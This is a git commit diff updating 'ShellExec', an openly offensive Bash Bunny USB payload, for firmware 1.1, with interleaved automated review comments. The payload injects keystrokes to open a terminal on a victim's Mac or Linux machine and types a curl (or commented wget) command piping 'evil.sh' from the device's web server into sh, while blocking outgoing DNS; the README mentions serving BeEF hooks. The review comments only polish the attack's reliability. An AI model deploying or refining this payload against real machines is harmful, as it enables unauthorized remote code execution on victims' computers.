updates shellexec for bashbunny fw1.1 (#203)

Alex Flores 2017-04-26 17:03:57 -10:00 committed by Sebastian Kinne
parent 9efc5e95a0
commit 22cbf92a3b
2 changed files with 22 additions and 21 deletions

@ -3,20 +3,22 @@
# Title: ShellExec
# Author: audibleblink
# Target: Mac/Linux
# Version: 1.0
# Version: 1.1
#
# Create a web server on the BashBunny and forces
# the victim download and execute a script.
# Create a web server on the BashBunny and force
# the victim to download and execute a script.
# Perfect for when mass storage isn't an option.
#
# White | Ready
# Ammber blinking | Waiting for server
# Blue blinking | Attacking
# Green | Finished
LED R G B
LED SETUP
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
source bunny_helpers.sh
GET SWITCH_POSITION
GET HOST_IP
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
log_file=$payload_dir/shellexec.log
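
Review bot: The LED legend in the header comment ("White | Ready" through "Green | Finished") still documents the old colour commands, while this change moves the payload to named LED states, starting with `LED SETUP` in this hunk. Update the legend to list the named states the payload now sets and what each one means, and fix the "Ammber" typo while touching it.
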
@ -24,7 +26,7 @@ log_file=$payload_dir/shellexec.log
cd $payload_dir
# starting server
LED R G 500
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
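
Review bot: `cd $payload_dir` on the first context line is unquoted and its result is never checked, so if the directory does not resolve, the server started after the "# starting server" comment runs from whatever the current directory happens to be. Suggest `cd "$payload_dir" || exit 1`. Separately, the `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule is appended and none of the hunks shown here delete it, which leaves outgoing DNS blocked after the server is up; a matching `-D` once port 80 is listening would scope the rule to the startup window the comment describes.
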
@ -34,21 +36,18 @@ python -m SimpleHTTPServer 80
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED B 500
LED ATTACK
Q GUI SPACE
Q DELAY 300
Q STRING terminal
Q DELAY 100
Q ENTER
Q DELAY 2000
# macOS
QUACK RUN OSX terminal
QUACK DELAY 2000
# Q ALT F2 # swap with block above for linux
# Q DELAY 100
# ubunutu
# QUACK RUN UNITY xterm
# QUACK DELAY 2000
Q STRING curl "http://$HOST_IP/evil.sh" \| sh
QUACK STRING curl "http://$HOST_IP/evil.sh" \| sh
# in case curl isn't installed
# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh
Q ENTER
LED G
# QUACK STRING wget -O - "http://$HOST_IP/evil.sh" \| sh
QUACK ENTER
LED SUCCESS
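
Review bot: The wait loop `while ! nc -z localhost 80; do sleep 0.2; done` at the top of this hunk has no upper bound, so if the `python -m SimpleHTTPServer 80` process named in the hunk header never binds the port, the payload stays in the `LED SPECIAL` state indefinitely and never signals an error. Bound the number of retries and leave through a failure path when the limit is reached. Minor: "ubunutu" in the commented-out Linux block should read "ubuntu".
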

@ -1,7 +1,7 @@
# ShellExec
Author: audibleblink
Version: 1.0
Version: 1.1
## Description
@ -10,6 +10,8 @@ victims to curl and execute those scripts. Scripts can also force
browsers to open a url on the bunny to do things like serve BeEF
hooks.
Perfect for when mass storage isn't an option.
## Configuration
evil.py - script that is fetched with DuckyScript
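
Review bot: The Configuration entry on the last line names `evil.py`, but the payload lines in this same commit request `http://$HOST_IP/evil.sh`, so in the lines shown the README points at a file name the payload never fetches. Make the two agree (the payload pipes the download to `sh`, so `evil.sh` looks like the intended name), and since the README is already being touched for 1.1, note there that the LED states changed to the named ones.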